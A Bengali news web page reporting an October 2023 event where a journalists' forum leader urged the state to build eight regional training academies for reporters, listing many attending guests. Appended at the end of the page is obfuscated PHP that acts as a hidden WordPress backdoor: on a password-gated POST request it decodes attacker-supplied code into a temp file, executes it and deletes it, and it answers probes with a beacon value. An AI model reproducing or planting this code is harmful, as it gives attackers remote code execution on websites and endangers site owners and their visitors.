• বুধবার, ১৯ জুন ২০২৪, ১১:৫০ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

সংবাদকর্মীদের দক্ষ করে গড়ে তুলতে রাষ্ট্রকে উদ্যোগী ভুমিকা নিতে হবে

ফরিদুল মোস্তফা খানঃ
আপডেট : শনিবার, ২১ অক্টোবর, ২০২৩


ফরিদুল মোস্তফা খান :


সংবাদকর্মীদের দক্ষ করে গড়ে তোলার জন্য রাষ্ট্রকে উদ্যোগী ভূমিকা গ্রহণ করতে হবে। অদক্ষ সংবাদ কর্মীদের কারণে দেশের মানুষ নানাভাবে ক্ষতিগ্রস্থ হয়ে থাকে। সাংবাদিকদের সম্পর্কে সাধারণ মানুষ নেগেটিভ মন্তব্য করে থাকেন। পর্যাপ্ত প্রশিক্ষণ না থাকার ফলে অত্যন্ত চৌকস, বুদ্ধিমত্তা সম্পন্ন পেশাটি আজ নিম্মস্তরে নেমে গেছে। প্রশিক্ষণের জন্য ৮ বিভাগে ৮টি সাংবাদিক প্রশিক্ষণ একাডেমি গড়ে তোলার জন্য রাষ্ট্রের প্রতি আহ্বান জানিয়েছেন বাংলাদেশ মফস্বল সাংবাদিক ফোরামের ট্রাস্টি বোর্ডের চেয়ারম্যান ও কেন্দ্রীয় নির্বাহী সভাপতি আহমেদ আবু জাফর। তিনি শুক্রবার রাতে রাজধানীর উত্তরায় একটি হোটেলে অনলাইন ভিত্তিক বাংলা নিউজ টিভির প্রতিষ্ঠা বার্ষিকীর অনুষ্ঠানে প্রধান বক্তার বক্তব্যে এ কথা বলেছেন।

এ প্রসঙ্গে যুক্তি তুলে ধরে তিনি বলেন রাষ্ট্রীয় বাহিনী আনসার, পুলিশ,সেনাদের জন্য প্রশিক্ষণ একাডেমী রয়েছে। একাডেমী রয়েছে ইমামদের প্রশিক্ষণের জন্যও। সরকারি চাকরিজীবীদের জন্য পৃথক প্রশিক্ষণ একাডেমি রয়েছে। গণমাধ্যমও কিন্তু রাষ্ট্রের একটি স্তম্ভ। আর এই স্তম্ভটির জন্য সরকারি ভাবে শুধুমাত্র একটি প্রশিক্ষণ কেন্দ্র পিআইবি রয়েছে। যেটি দ্বারা গোটা দেশের সাংবাদিকদের প্রশিক্ষণের আওতায় আনা সম্ভব হচ্ছেনা। এ ব্যাপারে সরকারের উদ্যোগী ভূমিকা থাকা জরুরি হয়ে পড়েছে।

অনুষ্ঠানে বাংলা নিউজ টিভি ও আরসিআই প্রাইভেট লিঃ এর চেয়ারম্যান আতাউর রহমান এর সভাপতিত্বে ও বাংলা নিউজ টিভির নির্বাহী পরিচালক, মো. সোহেল মিয়ার সার্বিক তত্বাবধানে, মো. শাহাদাৎ হোসেন শাওনের সঞ্চালনায় প্রধান অতিথি হিসেবে উপস্থিত ছিলেন গাজীপুর সিটি করপোরেশনের প্রধান উপদেষ্টা ও সাবেক মেয়র আলহাজ্ব এডভোকেট মোঃ জাহাঙ্গীর আলম।

অনুষ্ঠানের উদ্বোধন করেন এ্যালায়েন্স অব বাংলাদেশ জার্নালিস্ট অর্গানাইজেশন- এ্যাবজার সভাপতি শাহিন বাবু। সাংস্কৃতিক সন্ধ্যার প্রধান আকর্ষণ হিসেবে উপস্থিত ছিলেন যবরাজ খান চিত্রনায়ক- বাংলাদেশ ও ভারত চলচিত্র।

এসময় বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন আলহাজ ইঞ্জিঃ এম. এম হেলাল উদ্দিন, সভাপতি, টঙ্গী প্রেসক্লাব, এম. এম নাসির উদ্দিন, সাবেক সভাপতি, টঙ্গী সরকারি কলেজ ছাত্রলীগ, কাজী কামরুল, সাবেক সভাপতি, টঙ্গী সরকারি কলেজ ছাত্রলীগ, মো. ফারুক পাঠান,সাবেক ছাত্রলীক নেতা, টঙ্গী সরকারি কলেজ।

আমন্ত্রিত অতিথি হিসেবে উপস্থিত ছিলেন, এমএ মনসুর, ব্যবস্থাপনা পরিচালক-সিলিকন মাইগ্রেশন এন্ড এমপ্লয়মেন্ট লিমিটেড, ইঞ্জিঃ মাগফিরুল ইসলাম, ব্যবস্থাপনা পরিচালক-ক্যাসেল ডেভেলপমেন্ট, সূচি ভুঁইয়া, চেয়ারম্যান-গ্লোবাল ফ্যাশন সূচি, সম্পদ ভুঁইয়া,ব্যবস্থাপনা পরিচালক-গ্লোবাল ফ্যাশন সূচি,জাহেদুর রহমান রনি, সত্ত্বাধিকারী সুলতান সোলাইমান রেস্টুরেন্ট, মোঃ জাহিদুল হক ডালিম, সত্ত্বাধিকারী, এটুজেড ইঞ্জিনিয়ারিং ওর্য়াকসপ।

এ সময় সম্মানিত অতিথি হিসেবে উপস্থিত ছিলেন, মো. আশরাফ সরকার সম্পাদক ও প্রকাশক দৈনিক একুশের বাণী, খন্দকার সাইফুল ইসলাম স্বজল নির্বাহী সম্পাদক দৈনিক নববাণী, মো. মোখলেছুর রহমান মাছুম, সম্পাদক ও প্রকাশক, দৈনিক আজকের আলোকিত সকাল, মো. আবু বক্কর সিদ্দিক, সম্পাদক ও প্রকাশক, সাপ্তাহিক জনতার নিশ্বাস, বিএমএসএফ’র ট্রাস্টি বোর্ডের সদস্য রফিকুল ইসলাম মীরপুরি, মো. আব্দুল হামিদ খান, সভাপতি- বিএমএসএফ, গাজীপুর জেলা কমিটি, মো. মোস্তাফিজুর রহমান মোস্তাক, সভাপতি- বিএমএসএফ নরসিংদী জেলা কমিটি, ঢাকা জেলা উত্তরের সাংগঠনিক সম্পাদক মোস্তাফিজুর রহমান মিরাজ, মো. শহিদুল ইসলাম, সাধারন সম্পাদক-গাজীপুর মহানগর প্রেসক্লাব,মো. রফিকুল ইসলাম, সিঃ সহ-সভাপতি- আইনী সহায়তা কেন্দ্র (আসক) ফাউন্ডেশন,গাজীপুর জেলা কমিটি, মো. নাজমুল ইসলাম মন্ডল, তথ্য ও যোগাযোগ বিষয়ক সম্পাদক-আইনী সহায়তা কেন্দ্র (আসক) ফাউন্ডেশন,গাজীপুর জেলা কমিটি, মো. মাজনুন মাসুদ, সম্পাদক- লাইভ নিউজ বিডি ডটকম, মো. নজরুল ইসলাম, বাংলা নিউজ টিভির,মো. শহিদুল্লাহ সরকার, সুমা ইসলাম লুবনা, মাহমুদা আফরোজ লিজা, মো. রাজু আহম্মেদ, মোস্তফা,আব্দুল আলী, মো. আনিছ মাল, আজুফা, মিনহাজুর রহমান।
এসময় বক্তারা বাংলা নিউজ টিভির সার্বাঙ্গিক মঙ্গল কামনা করে বলেন, বাংলা নিউজ টিভি দীর্ঘদিন ধরে সুনামের সাথে সংবাদ প্রকাশ করে আসছে, বাংলা নিউজ টিভিতে প্রচারিত সংবাদগুলো বাংলাদেশ তথা সমগ্র বিশ্বের মানুষগুলোর নিকট প্রশংসনীয়। এসময় বক্তারা বাংলা নিউজ টিভির সফলতা কামনা করেন। আলোচনা ও কেক কাটা শেষে, জনপ্রিয় দেশী বিদেশী সংগীত শিল্পীরা গান পরিবেশন করেন।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (রাত ১১:৫০)
  • ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৩ই জিলহজ, ১৪৪৫ হিজরি
  • ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}